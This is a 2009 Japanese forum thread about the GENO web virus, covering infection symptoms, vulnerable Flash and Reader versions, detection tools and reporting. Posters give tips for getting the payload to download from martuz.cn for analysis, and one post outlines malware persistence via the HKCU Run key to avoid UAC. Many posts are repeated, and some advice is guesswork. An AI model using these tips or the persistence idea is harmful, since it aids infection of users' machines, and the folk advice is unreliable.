同人サイトとかランキングとか同人サイトのリンクから梯子したりすれば見つかるんじゃない?
レポートかw
確かにブログネタにしたら訪問者増えるよね、きっと
怖くて今ケータイからやってるんで力になってあげられないけど
同人サイトとかランキングとか同人サイトのリンクから梯子したりすれば見つかるんじゃない?
556 :192.168.0.774:2009/05/18(月) 03:27:13 ID:uebw+uxF0
557 :192.168.0.774:2009/05/18(月) 03:27:21 ID:pFQN0G770
558 :192.168.0.774:2009/05/18(月) 03:27:56 ID:7HSqf6Si0
面白い流れになってきたなw
559 :192.168.0.774:2009/05/18(月) 03:29:39 ID:WSfvVExd0
>>557
>>207
Flash Playerは10.0.22.87と9.0.159.0がGENO関連の脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0がGENO関連の脆弱性を修正したver
以降は別の脆弱性を修正したver
>>207
Flash Playerは10.0.22.87と9.0.159.0がGENO関連の脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0がGENO関連の脆弱性を修正したver
以降は別の脆弱性を修正したver
560 :192.168.0.774:2009/05/18(月) 03:29:45 ID:gtQ58YdFO
外も中もウイルスだらけだな…(´д`)
561 :192.168.0.774:2009/05/18(月) 03:30:55 ID:6Sa4e4kP0
>>545
サンクス
とりあえず上の項目は全部試してる
ただ下の項目の下二つは
VMware上のXPでAthlon 64 X2 5600+だから
条件をクリアできてないな
>>549
まぁそれは今回の検証のオチってやつだよw
>>550
おねがいしますm( __ __ )m
>>552
IPはいろいろあって何度も変えてる
けど感染してない
>>553
一応リボンマジックも直接URLを入力して踏んでみた
けど感染しなかった
>>555
一月ぶりぐらいにかくブログですw
サンクス
とりあえず上の項目は全部試してる
ただ下の項目の下二つは
VMware上のXPでAthlon 64 X2 5600+だから
条件をクリアできてないな
>>549
まぁそれは今回の検証のオチってやつだよw
>>550
おねがいしますm( __ __ )m
>>552
IPはいろいろあって何度も変えてる
けど感染してない
>>553
一応リボンマジックも直接URLを入力して踏んでみた
けど感染しなかった
>>555
一月ぶりぐらいにかくブログですw
562 :192.168.0.774:2009/05/18(月) 03:32:07 ID:pFQN0G770
>>559
おお、そういうことだったのかありがとう
おお、そういうことだったのかありがとう
563 :192.168.0.774:2009/05/18(月) 03:32:57 ID:SGBG03gk0
実はすでに感染してるんじゃね・・・?
564 :192.168.0.774:2009/05/18(月) 03:33:28 ID:WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771、>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
>>771、>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
565 :192.168.0.774:2009/05/18(月) 03:34:39 ID:CVgAB4qkP
564 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:33:28 ID:WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771、>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771、>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
566 :192.168.0.774:2009/05/18(月) 03:35:19 ID:Z5hmtXFr0
565 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:34:39 ID:CVgAB4qkP
564 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:33:28 ID:WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771、>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
564 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:33:28 ID:WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771、>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
567 :192.168.0.774:2009/05/18(月) 03:35:33 ID:PGXf1oVHO
>>560
まったくですね、新型インフルエンザ流行ってるから外出控えようと思って家でPCしようと思ったらウイルスが出回ってて、なんだかなー;
>>561
良い記事書いてくださいな(・∀・)オーエン
海外の二次創作サイトって感染してる所あるのかな
それともアダルトサイトの方が感染しやすいとか?
まったくですね、新型インフルエンザ流行ってるから外出控えようと思って家でPCしようと思ったらウイルスが出回ってて、なんだかなー;
>>561
良い記事書いてくださいな(・∀・)オーエン
海外の二次創作サイトって感染してる所あるのかな
それともアダルトサイトの方が感染しやすいとか?
568 :192.168.0.774:2009/05/18(月) 03:35:42 ID:yKeLT0rF0
569 :192.168.0.774:2009/05/18(月) 03:36:13 ID:uebw+uxF0
570 :192.168.0.774:2009/05/18(月) 03:37:43 ID:gtQ58YdFO
外出もままならない、ネットもできない今、やることはポケモンしかねえ…
571 :192.168.0.774:2009/05/18(月) 03:38:11 ID:bnpUDzMr0
今日はウイルスの恐ろしさとストーカーの恐ろしさを知ることが出来た
572 :192.168.0.774:2009/05/18(月) 03:38:39 ID:6Sa4e4kP0
>>556
ちょっとググってみます
>>557
そういやリボンマジックじゃ
IP変えてないからちょっと試してみます
>>563
今のところsqlsodbc.chmのサイズは変化なし
再起動後も通常起動確認
>>567
ありがと
>>568
その二つはまだ踏んでないです・・・
今から踏んできます
ちょっとググってみます
>>557
そういやリボンマジックじゃ
IP変えてないからちょっと試してみます
>>563
今のところsqlsodbc.chmのサイズは変化なし
再起動後も通常起動確認
>>567
ありがと
>>568
その二つはまだ踏んでないです・・・
今から踏んできます
573 :192.168.0.774:2009/05/18(月) 03:40:03 ID:SGBG03gk0
>>572
レジストリの確認はした?
レジストリの確認はした?
574 :192.168.0.774:2009/05/18(月) 03:40:25 ID:XWeKEH7q0
>>545
ちょっと説明が不十分なので修正
× ・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
○ ・ロケーションバーにmartuz.cnを打ち込んでアクセスするのではなく、感染サイトからアクセスする。リファラを切っている場合は有効にする
>>561
となるとやはりredearとflashのバージョンかな。
reader 8.1.2、flash 9.0.115以下あたりではどうだろう。
ちょっと説明が不十分なので修正
× ・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
○ ・ロケーションバーにmartuz.cnを打ち込んでアクセスするのではなく、感染サイトからアクセスする。リファラを切っている場合は有効にする
>>561
となるとやはりredearとflashのバージョンかな。
reader 8.1.2、flash 9.0.115以下あたりではどうだろう。
575 :192.168.0.774:2009/05/18(月) 03:41:55 ID:O4S1nyz60
豚インフルとgenoウイルスの発見が同時期くらい
豚インフルの国内初感染者確認と同人板の感染者騒ぎがほぼ同時
あっちもこっちも絶妙なタイミングで大変だな
豚インフルの国内初感染者確認と同人板の感染者騒ぎがほぼ同時
あっちもこっちも絶妙なタイミングで大変だな
576 :192.168.0.774:2009/05/18(月) 03:43:26 ID:x3CeUoiK0
まさかGENOウイルスなんてなかった、なんてことはないよな?
577 :192.168.0.774:2009/05/18(月) 03:45:41 ID:gtQ58YdFO
>>576
それは一体どういうことだ?
それは一体どういうことだ?
578 :ひみつの文字列さん:2024/04/28(日) 12:36:55 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
579 :192.168.0.774:2009/05/18(月) 03:48:56 ID:x3CeUoiK0
580 :192.168.0.774:2009/05/18(月) 03:52:06 ID:6Sa4e4kP0
>>573
中身までは確認してないけど
起動はするみたいです
>>574
現在のヴァージョンは
reader 8.1.2
flash player 9.0.159.0
ですね
flash playerをもっとダウングレードしてみます
それととりあえずティアラモードと株式会社まどかを
踏んでみたけど感染症状なし
>>578
ちょっと試してみます
中身までは確認してないけど
起動はするみたいです
>>574
現在のヴァージョンは
reader 8.1.2
flash player 9.0.159.0
ですね
flash playerをもっとダウングレードしてみます
それととりあえずティアラモードと株式会社まどかを
踏んでみたけど感染症状なし
>>578
ちょっと試してみます
581 :192.168.0.774:2009/05/18(月) 03:54:51 ID:PGXf1oVHO
でっち上げかもね
582 :192.168.0.774:2009/05/18(月) 03:55:50 ID:SGBG03gk0
583 :192.168.0.774:2009/05/18(月) 03:57:20 ID:VzSgGubRO
これ、感性の可能性あるのはWindowsのみ?
マックは平気なのかな?
マックは平気なのかな?
584 :192.168.0.774:2009/05/18(月) 03:58:27 ID:6Sa4e4kP0
585 :192.168.0.774:2009/05/18(月) 04:00:07 ID:e2dzUe840
自分のPCが感染してるかどうか
確実に確認できるウイルスチェッカー教えてください
確実に確認できるウイルスチェッカー教えてください
586 :192.168.0.774:2009/05/18(月) 04:00:41 ID:gtQ58YdFO
>>579
確かに感染の波は少し変わってるが、存在そのものを否定するのは難しいぞ。
現に俺のパソコン感染したからな。まとめwikiに記載されてた症状と一致しまくった。
だがウイルスという名義で別の目的の用途をなしていたとしたら…それもそれで考えは広がるが。
(個人的な想像、もしもまとめwikiそのものがウイルスでっちあげ&発祥源だったらカオス)
確かに感染の波は少し変わってるが、存在そのものを否定するのは難しいぞ。
現に俺のパソコン感染したからな。まとめwikiに記載されてた症状と一致しまくった。
だがウイルスという名義で別の目的の用途をなしていたとしたら…それもそれで考えは広がるが。
(個人的な想像、もしもまとめwikiそのものがウイルスでっちあげ&発祥源だったらカオス)
587 :192.168.0.774:2009/05/18(月) 04:00:41 ID:PGXf1oVHO
一応聞かせて、ケータイでPCブラウザ見ても感染しないよね?
588 :192.168.0.774:2009/05/18(月) 04:03:45 ID:gtQ58YdFO
>>578
それはわからん。ただ携帯のフルブラウザで開くと感染の疑いがあるらしい。ただの携帯のインターネットなら問題ないが、PCページはどうかは不明だな。
調べても情報が入り混じっていて自分で確かめるしか確かな情報は得られないと思う…。
それはわからん。ただ携帯のフルブラウザで開くと感染の疑いがあるらしい。ただの携帯のインターネットなら問題ないが、PCページはどうかは不明だな。
調べても情報が入り混じっていて自分で確かめるしか確かな情報は得られないと思う…。
589 :192.168.0.774:2009/05/18(月) 04:04:49 ID:x3CeUoiK0
590 :192.168.0.774:2009/05/18(月) 04:06:23 ID:yKeLT0rF0
>>587-588
無い無い
ウイルス貰う事ができてもウイルスが動ける場所が携帯にはない。
PCように設計されてるウイルスだから、PCのシステムファイルがないと
役立たずだよ。MACやゲーム類もそうだよ。
携帯でブラウザ見れても、Windows専用ゲームとかはできないだろ
無い無い
ウイルス貰う事ができてもウイルスが動ける場所が携帯にはない。
PCように設計されてるウイルスだから、PCのシステムファイルがないと
役立たずだよ。MACやゲーム類もそうだよ。
携帯でブラウザ見れても、Windows専用ゲームとかはできないだろ
591 :192.168.0.774:2009/05/18(月) 04:08:31 ID:e2dzUe840
>>578
うちのXPが今のところ
sqlsodbc.chm → 1323バイト
regedit → 起動できず
cmd → 問題なし
タスクマネージャのsvchost → 問題なし
なんだけど、そっちのツールだと
「みつからなかったけど油断しないで下さい」だった。
これはどうなの?
うちのXPが今のところ
sqlsodbc.chm → 1323バイト
regedit → 起動できず
cmd → 問題なし
タスクマネージャのsvchost → 問題なし
なんだけど、そっちのツールだと
「みつからなかったけど油断しないで下さい」だった。
これはどうなの?
592 :192.168.0.774:2009/05/18(月) 04:09:17 ID:yKeLT0rF0
>>591
アウト
アウト
593 :192.168.0.774:2009/05/18(月) 04:09:24 ID:gtQ58YdFO
594 :192.168.0.774:2009/05/18(月) 04:10:43 ID:e2dzUe840
>>592
うるさいうるさいうるさい
うるさいうるさいうるさい
595 :192.168.0.774:2009/05/18(月) 04:11:15 ID:PGXf1oVHO
>>588
(;゚Д゚)
やっぱりフルブラウザは感染する可能性も無いと言えないんだね
フルじゃなければ良いのかな…
てかケータイの場合、感染したらどういった影響を及ぼすのか解らない…
だれか情報見つけたら教えてくださいませー(-人-)
自分で確かめるのは怖くて
(;゚Д゚)
やっぱりフルブラウザは感染する可能性も無いと言えないんだね
フルじゃなければ良いのかな…
てかケータイの場合、感染したらどういった影響を及ぼすのか解らない…
だれか情報見つけたら教えてくださいませー(-人-)
自分で確かめるのは怖くて
596 :192.168.0.774:2009/05/18(月) 04:11:39 ID:JmCcr4Q60
597 :192.168.0.774:2009/05/18(月) 04:11:45 ID:gtQ58YdFO
598 :192.168.0.774:2009/05/18(月) 04:13:26 ID:gtQ58YdFO
599 :192.168.0.774:2009/05/18(月) 04:13:28 ID:RvJr4U680
最新のウィルスが来たんだって?
テンプレを読んでも分かりにくい・・・
できれば画像か動画はないか?
テンプレを読んでも分かりにくい・・・
できれば画像か動画はないか?
600 :192.168.0.774:2009/05/18(月) 04:13:42 ID:PGXf1oVHO
601 :192.168.0.774:2009/05/18(月) 04:13:47 ID:wsKEiiw60
少なくとも、SymantecやKasperskyよりは仕事してるようだが、『 ファイルを無断で削除 』してくれた
ので他人に勧めにくい。 (この感じだと、誤検出もばっさり無断で削除しそうな感じ。)
一応、試す人は自己責任で。 誤検出の時にばっさりやられても泣かない人だけに勧めます。
Microsoftのオンラインスキャン→ ttp://onecare.live.com/site/ja-jp/default.htm
>>424より
>>591試す価値あるかもあくまで自己責任で
ので他人に勧めにくい。 (この感じだと、誤検出もばっさり無断で削除しそうな感じ。)
一応、試す人は自己責任で。 誤検出の時にばっさりやられても泣かない人だけに勧めます。
Microsoftのオンラインスキャン→ ttp://onecare.live.com/site/ja-jp/default.htm
>>424より
>>591試す価値あるかもあくまで自己責任で
602 :192.168.0.774:2009/05/18(月) 04:15:42 ID:RX899dBK0
603 :192.168.0.774:2009/05/18(月) 04:16:37 ID:gtQ58YdFO
初期化後のデスクトップの何もなさははんぱなさすぎて感動するぜ、ファイト
604 :192.168.0.774:2009/05/18(月) 04:22:28 ID:mLA05Iwx0
今ウィンドウズモバイル搭載のスマートフォンで成美堂のURL踏んできた
イーモバイルのS21HT
IEとオペラでアクセスしたんだが別に動作が重たくなったりする訳でもなく大丈夫っぽいわ
携帯に感染しないのは分かってたが、ウィンドウズモバイルだとどうか分からなかったのでとりあえず人柱報告。
だからといって他の携帯が全て感染しないとは言い切れないのでその辺は自己責任な
イーモバイルのS21HT
IEとオペラでアクセスしたんだが別に動作が重たくなったりする訳でもなく大丈夫っぽいわ
携帯に感染しないのは分かってたが、ウィンドウズモバイルだとどうか分からなかったのでとりあえず人柱報告。
だからといって他の携帯が全て感染しないとは言い切れないのでその辺は自己責任な
605 :192.168.0.774:2009/05/18(月) 04:28:01 ID:MnmraP/O0
誤って成美堂のトコ踏んじゃったんだけど
sqlsodbc.chmは50.727でregeditとcmdも
起動したから問題無いかな?マジで不安だ……
sqlsodbc.chmは50.727でregeditとcmdも
起動したから問題無いかな?マジで不安だ……
606 :192.168.0.774:2009/05/18(月) 04:28:48 ID:dmXVT3NS0
一応こっちでも回線をつなぎ変えて踏んでみたが、pdf、swfが落ちてこない。
串を通して踏んだら落ちてきた。
どうもうちのISPの一部または全部がmartuz.cnに焼かれているようだ。
他にも検体が落ちてこない人はISPごと焼かれているのかもしれない。
串を通して踏んだら落ちてきた。
どうもうちのISPの一部または全部がmartuz.cnに焼かれているようだ。
他にも検体が落ちてこない人はISPごと焼かれているのかもしれない。
608 :192.168.0.774:2009/05/18(月) 04:32:46 ID:e2dzUe840
609 :192.168.0.774:2009/05/18(月) 04:32:47 ID:RvJr4U680
結局画像か動画で取れたやついないの?
これじゃあ、どんな危険なのか良く分からん
俺が調べたところでは
・情報が盗まれる可能性があり
・つかまったらインスコ以外脱出不可 PCの中身があぽーん行き
・対処しようとしても勝手にメモリが食ってブルースクリーンにされる
という感じだな
これじゃあ、どんな危険なのか良く分からん
俺が調べたところでは
・情報が盗まれる可能性があり
・つかまったらインスコ以外脱出不可 PCの中身があぽーん行き
・対処しようとしても勝手にメモリが食ってブルースクリーンにされる
という感じだな
610 :192.168.0.774:2009/05/18(月) 04:34:20 ID:e2dzUe840
611 :192.168.0.774:2009/05/18(月) 04:37:37 ID:JmCcr4Q60
>>609
動画取ってどーすんだ?ブラクラじゃあるめーし目で見て判るようなウィルスだったら誰も苦労しねーよw
動画取ってどーすんだ?ブラクラじゃあるめーし目で見て判るようなウィルスだったら誰も苦労しねーよw
612 :192.168.0.774:2009/05/18(月) 04:41:13 ID:gb9ZDt5LO
>>591
どうみても完全に妖精です。
ヘルプファイルは46KB(英語)か50KB(日本語)以外アウト
加えてレジストリエディタ起動不能
コマンドプロンプト起動で重症化するかも
さっさとバックアップ取って再インストールしろ
どうみても完全に妖精です。
ヘルプファイルは46KB(英語)か50KB(日本語)以外アウト
加えてレジストリエディタ起動不能
コマンドプロンプト起動で重症化するかも
さっさとバックアップ取って再インストールしろ
613 :192.168.0.774:2009/05/18(月) 04:44:22 ID:V/AoiShOO
FC2ブログは感染しないよね?
それだけ教えて
それだけ教えて
614 :192.168.0.774:2009/05/18(月) 04:44:24 ID:k2CI1leb0
>>607
同じIPからの接続の場合、一定時間スリープするらしい。
時間を置かないと検体が拾えない。
で、>>578見てて思ったんだけど、Adobeの脆弱性がある環境なら、
ウィルス側がVistaを除外する必要ないよな。
HKLMの改変やProgram FilesやWindows以下のフォルダをいじると
UACが発動しちゃうけど、Users以下のフォルダに実体を置いて、
HKCU以下のレジストリ(\Software\Microsoft\Windows\CurrentVersion\Run)とか
なら発動しないでしょ。Adobe Updaterあたりに偽装したアプリでも仕込んで
おけばその後ユーザーにUAC昇格ダイアログでボタンを押させることも
できちゃうだろうし。
同じIPからの接続の場合、一定時間スリープするらしい。
時間を置かないと検体が拾えない。
で、>>578見てて思ったんだけど、Adobeの脆弱性がある環境なら、
ウィルス側がVistaを除外する必要ないよな。
HKLMの改変やProgram FilesやWindows以下のフォルダをいじると
UACが発動しちゃうけど、Users以下のフォルダに実体を置いて、
HKCU以下のレジストリ(\Software\Microsoft\Windows\CurrentVersion\Run)とか
なら発動しないでしょ。Adobe Updaterあたりに偽装したアプリでも仕込んで
おけばその後ユーザーにUAC昇格ダイアログでボタンを押させることも
できちゃうだろうし。
615 :192.168.0.774:2009/05/18(月) 04:44:50 ID:e2dzUe840
616 :192.168.0.774:2009/05/18(月) 04:46:47 ID:RvJr4U680
617 :192.168.0.774:2009/05/18(月) 04:49:09 ID:gb9ZDt5LO
618 :192.168.0.774:2009/05/18(月) 04:49:15 ID:uebw+uxF0
619 :192.168.0.774:2009/05/18(月) 04:51:19 ID:Zugt4NPJO
今言われてるレジストリに残る形跡って具体的にどんなのなんだ
件のchmファイルは正常動作してるけど…
件のchmファイルは正常動作してるけど…
620 :192.168.0.774:2009/05/18(月) 04:51:40 ID:c4TnzPSv0
621 :192.168.0.774:2009/05/18(月) 04:52:08 ID:/4TBD5OI0
>>615には不謹慎な質問だけど
感染したサイトがわかるなら教えてくれないか?
感染したサイトがわかるなら教えてくれないか?
622 :192.168.0.774:2009/05/18(月) 04:52:41 ID:JmCcr4Q60
623 :192.168.0.774:2009/05/18(月) 04:52:51 ID:DIbDMt2D0
>>615
完全にアウト
自分も感染してリカバリ組だけど>>591の症状とほぼ一致というか
regeditも起動してアンチウイルスサイト関連にも繋がったけどやられてた
重症化する前にあきらめて対策とった方がいいよ、頑張れ
バックアップも感染してるの残さないように慎重にな
完全にアウト
自分も感染してリカバリ組だけど>>591の症状とほぼ一致というか
regeditも起動してアンチウイルスサイト関連にも繋がったけどやられてた
重症化する前にあきらめて対策とった方がいいよ、頑張れ
バックアップも感染してるの残さないように慎重にな
624 :192.168.0.774:2009/05/18(月) 04:52:53 ID:iUubSaQo0
とりあえずシステムの復元で問題なく使えているが
大事なID・パスワード入力はキーログされない
ソフトウエアキーボード入力にするわ
↓
ttp://www.vector.co.jp/soft/win95/util/se040870.html
大事なID・パスワード入力はキーログされない
ソフトウエアキーボード入力にするわ
↓
ttp://www.vector.co.jp/soft/win95/util/se040870.html
625 :192.168.0.774:2009/05/18(月) 04:54:03 ID:e2dzUe840
>>614
>同じIPからの接続の場合、一定時間スリープするらしい。
その問題を回避するためにルータ再起動してIPを変えてみたんだが、
相変わらず検体は落ちてこない。
たぶんISPごと焼かれてるんだと思う。
もしかするとこれも時間が経てば落ちてくるようになるのかもしれないけど。
>同じIPからの接続の場合、一定時間スリープするらしい。
その問題を回避するためにルータ再起動してIPを変えてみたんだが、
相変わらず検体は落ちてこない。
たぶんISPごと焼かれてるんだと思う。
もしかするとこれも時間が経てば落ちてくるようになるのかもしれないけど。
627 :192.168.0.774:2009/05/18(月) 04:56:40 ID:RvJr4U680
本当にGENOウイルスは世界最強だな
対処法はなし ウィルスセキュリティで検索しても引っかかりにくい つかまったらインスコしかなくPC中身はあぽーんされる
もう、各機関に通報されてもいいレベルだな と言っても既に見つかって対処法を考えてるだろうな
対処法はなし ウィルスセキュリティで検索しても引っかかりにくい つかまったらインスコしかなくPC中身はあぽーんされる
もう、各機関に通報されてもいいレベルだな と言っても既に見つかって対処法を考えてるだろうな
628 :192.168.0.774:2009/05/18(月) 04:57:09 ID:uebw+uxF0
かかりたい人間には、なかなかかからない。
インフルエンザにかかって学校を休みたい学生の気分だな
インフルエンザにかかって学校を休みたい学生の気分だな
629 :192.168.0.774:2009/05/18(月) 04:57:56 ID:PGXf1oVHO
ケータイからなんだけど
感染してそうな同人サイトみつけた
30分前にアクセスした同人サイトの日記にGENOウイルスについての記事書いてあって
今もう一度そのサイト開いたらページが表示できなかった
感染してそうな同人サイトみつけた
30分前にアクセスした同人サイトの日記にGENOウイルスについての記事書いてあって
今もう一度そのサイト開いたらページが表示できなかった
630 :192.168.0.774:2009/05/18(月) 04:58:54 ID:/4TBD5OI0
631 :192.168.0.774:2009/05/18(月) 04:59:14 ID:JmCcr4Q60
>>624
ポインタクリックした時点のポインタ周辺の画像転送してID、PASS抜きってものあるので
ソフトウェアキーボードでも確実に安全っつー訳じゃないからなぁ…
主にネトゲのPASS抜きトロイで使われる手法だけどね
ポインタクリックした時点のポインタ周辺の画像転送してID、PASS抜きってものあるので
ソフトウェアキーボードでも確実に安全っつー訳じゃないからなぁ…
主にネトゲのPASS抜きトロイで使われる手法だけどね
632 :192.168.0.774:2009/05/18(月) 05:00:38 ID:e2dzUe840
633 :192.168.0.774:2009/05/18(月) 05:01:01 ID:4oFiJRbxO
ジャバスクリプトとアクティブコントロール切ればie
634 :192.168.0.774:2009/05/18(月) 05:02:26 ID:PGXf1oVHO
635 :192.168.0.774:2009/05/18(月) 05:04:12 ID:uebw+uxF0
>>632
IDE→SATAの変換コネクタをかってきたらどうだ?
これとかいいよ。
SATA+IDE HDD つなが〜るKIT USB light
http://www.novac.co.jp/products/hardware/nv-hd/nv-tw130u/index.html
IDE→SATAの変換コネクタをかってきたらどうだ?
これとかいいよ。
SATA+IDE HDD つなが〜るKIT USB light
http://www.novac.co.jp/products/hardware/nv-hd/nv-tw130u/index.html
636 :192.168.0.774:2009/05/18(月) 05:05:38 ID:k2CI1leb0
>>624
キーロギングじゃなくてネットワークトラフィックを監視しているっぽいよ。
だから平文パスワードが流れるftpは思いっきりぶっこ抜かれるんじゃないかと。
>>626
そっか。それはすまんかった。
スリープするのは単一IPじゃなくてIP範囲なのかもしれないね。
ADSL再接続してIP変えても落ちてこないことは確かにある。
キーロギングじゃなくてネットワークトラフィックを監視しているっぽいよ。
だから平文パスワードが流れるftpは思いっきりぶっこ抜かれるんじゃないかと。
>>626
そっか。それはすまんかった。
スリープするのは単一IPじゃなくてIP範囲なのかもしれないね。
ADSL再接続してIP変えても落ちてこないことは確かにある。
637 :192.168.0.774:2009/05/18(月) 05:05:41 ID:iUubSaQo0
638 :192.168.0.774:2009/05/18(月) 05:06:57 ID:PGXf1oVHO
腐向け同人サイトを
ひたすら巡るしかないかなー
まとめに載ってるジャンルを。
コミケに応募したサイトとか、感染してるかも…
それかはネットでアンソロジー売ってるサイトとか
予想だけど
ひたすら巡るしかないかなー
まとめに載ってるジャンルを。
コミケに応募したサイトとか、感染してるかも…
それかはネットでアンソロジー売ってるサイトとか
予想だけど
639 :192.168.0.774:2009/05/18(月) 05:07:28 ID:4oFiJRbxO
書きかけで送信しちまった。
ジャバスクリプトとアクティブコントロール切ればieやスレイプニルでも予防可能?
ジャバスクリプトとアクティブコントロール切ればieやスレイプニルでも予防可能?
640 :192.168.0.774:2009/05/18(月) 05:08:39 ID:iUubSaQo0
641 :192.168.0.774:2009/05/18(月) 05:08:48 ID:uebw+uxF0
>>638
パソコンの前に、君の脳みそが感染しそうで俺は心配です。
パソコンの前に、君の脳みそが感染しそうで俺は心配です。
642 :192.168.0.774:2009/05/18(月) 05:09:38 ID:EAK2OqaQ0
ググるのは危険、と書いてあるからみんな情報収集しない…巧みだ…
643 :ひみつの文字列さん:2024/04/28(日) 12:36:55 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
644 :192.168.0.774:2009/05/18(月) 05:10:57 ID:PGXf1oVHO
645 :192.168.0.774:2009/05/18(月) 05:11:15 ID:e2dzUe840
>>635
おおサンキュー。そんなのあるのか。
急がずにじっくり調べるかな。
でも良く考えたらXPシステム用(Cドライブ)と、
データ用で別ドライブにしてたわ。
クリーンインストールっていっても
Cドライブだけでいいよね?
おおサンキュー。そんなのあるのか。
急がずにじっくり調べるかな。
でも良く考えたらXPシステム用(Cドライブ)と、
データ用で別ドライブにしてたわ。
クリーンインストールっていっても
Cドライブだけでいいよね?
646 :192.168.0.774:2009/05/18(月) 05:13:22 ID:PGXf1oVHO
マリーアントア・ネットワーク「ググるのが危険ならヤフれば良いじゃない!!」
647 :192.168.0.774:2009/05/18(月) 05:14:34 ID:uebw+uxF0
頼むからMSNにだけは感染しないでくれよ。
ホットメールが使えなくなるとかなりきつい。
ホットメールが使えなくなるとかなりきつい。
648 :192.168.0.774:2009/05/18(月) 05:14:59 ID:RvJr4U680
とりあえず、引っかかった人はすぐに各機関に通報するんだ!
・JCSA(日本コンピュータセキュリティ協会) http://www.jcsa.or.jp/
・情報処理推進機構 http://www.ipa.go.jp/security/topics/newvirus/newvirus-top.html
・警察 http://www.npa.go.jp/cyber/
・JCSA(日本コンピュータセキュリティ協会) http://www.jcsa.or.jp/
・情報処理推進機構 http://www.ipa.go.jp/security/topics/newvirus/newvirus-top.html
・警察 http://www.npa.go.jp/cyber/
649 :192.168.0.774:2009/05/18(月) 05:19:52 ID:l7w010Wk0
650 : ◆f/iQdjPxCM :2009/05/18(月) 05:19:58 ID:76hdi/6T0
>>591, >>602 辺り
というわけで、ごめんミスがあって見逃してた可能性があるので、
まだ>>601等での解決をしていないようなら
>>643 で再度試してもらえますか?
まぁ、あいかわらず試作なんで、
検出されなかったからといって居ないとは限らないということでお願いします。
というわけで、ごめんミスがあって見逃してた可能性があるので、
まだ>>601等での解決をしていないようなら
>>643 で再度試してもらえますか?
まぁ、あいかわらず試作なんで、
検出されなかったからといって居ないとは限らないということでお願いします。
651 :192.168.0.774:2009/05/18(月) 05:24:28 ID:k2CI1leb0
653 :192.168.0.774:2009/05/18(月) 05:28:12 ID:pcZYKxEF0
これは
スマン完全に誤爆だorz
655 :192.168.0.774:2009/05/18(月) 05:31:22 ID:2ybyztFx0
勇気あるな、>>638。俺なんかはもう、同人関連と関わりたくないわ。
セキュ板乗り込んで暴れ、質問に対して説明してやりゃ何故か逆切れ起こして掻き回す。
同人の板ではどうなってるかと思って見てみりゃ、私怨だか晒しだかウイルス防止よりジャンル?大事だとか言って、協力する気ゼロ。
それでいて、被害妄想だけは人一倍。
なんなんだ、あれは。
セキュ板乗り込んで暴れ、質問に対して説明してやりゃ何故か逆切れ起こして掻き回す。
同人の板ではどうなってるかと思って見てみりゃ、私怨だか晒しだかウイルス防止よりジャンル?大事だとか言って、協力する気ゼロ。
それでいて、被害妄想だけは人一倍。
なんなんだ、あれは。
656 :192.168.0.774:2009/05/18(月) 05:33:18 ID:tFgIi2z+0
何だかんだ言って、拡散防止に勤める気は皆無なんだもなぁ同人は
